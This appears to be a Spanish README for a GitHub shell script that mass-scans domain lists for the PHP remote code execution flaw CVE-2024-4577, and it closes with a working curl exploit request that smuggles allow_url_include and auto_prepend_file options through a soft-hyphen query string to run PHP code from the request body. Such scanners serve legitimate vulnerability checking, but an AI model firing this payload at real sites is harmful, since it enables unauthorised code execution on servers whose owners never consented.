
Script de shell para escanear dominios en busca de la vulnerabilidad de ejecución remota de código PHP CVE-2024-4577 mediante solicitudes POST manipuladas, exportando objetivos vulnerables para verificación manual.
Este script está diseñado para comprobar la vulnerabilidad descrita por CVE-2024-4577, que implica explotar ciertas configuraciones de PHP para ejecutar código arbitrario de forma remota. Envía una solicitud POST a endpoints especificados en una lista de dominios y verifica si la respuesta indica vulnerabilidad.
Instalar GNU Parallel:
sudo apt-get install parallel
Clonar el Repositorio: Clona este repositorio en tu máquina local usando Git:
git clone https://github.com/Yukiioz/CVE-2024-4577.git
Navegar al Repositorio: Cambia al directorio clonado:
cd CVE-2024-4577
Preparar Lista de Dominios: Crea un archivo de texto que contenga una lista de dominios a comprobar. Cada dominio debe estar en una nueva línea. Por ejemplo:
https://example1.com
https://example2.com
https://example3.com
Ejecutar el Script:
Ejecuta el script CVE-2024-4577.sh, pasando la ruta al archivo de lista de dominios como argumento:
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
Revisar la Salida:
El script mostrará información de progreso mientras comprueba cada dominio. Si se encuentra que un dominio es vulnerable, se resaltará en rojo. El script también exportará una lista de dominios vulnerables a un archivo llamado vulnerable_domains.txt.
vulnerable_domains.txtEl script exporta una lista de dominios vulnerables a un archivo llamado vulnerable_domains.txt. Este archivo contiene una lista simple de dominios vulnerables, con cada dominio en una nueva línea. Para confirmar manualmente, usa el comando curl para enviar una solicitud POST al endpoint objetivo en el dominio. Reemplaza https://dev.example.com/test.php con el endpoint real en el dominio objetivo.
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"